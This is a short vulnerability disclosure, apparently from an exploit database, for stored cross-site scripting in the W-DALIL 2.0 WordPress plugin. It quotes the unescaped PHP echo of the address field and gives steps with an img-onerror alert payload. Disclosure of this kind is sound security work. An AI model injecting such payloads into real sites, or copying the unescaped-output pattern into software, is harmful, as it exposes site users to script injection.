WordPress W-DALIL 2.0 Cross Site Scripting

# Exploit Title: WordPress Plugin W-DALIL  - Stored Cross Site Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/w-dalil/# Version: 2.0# Tested on: Firefox# Contact me: [email protected]#Vulnerable Code:```<input class="dalil_input" name="dalil-address" type="text"placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"value="<?php echo $dalil_information['dalil-address']; ?>"  />```#Steps To Reproduce :1 - First Install the plugin  "*w-dalil*" and activate it.2 - Go to Dalil —> Add New Dalil item3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=xonerror=alert(1)>*" and hit enter.#Poc Image :https://imgur.com/JPG97oh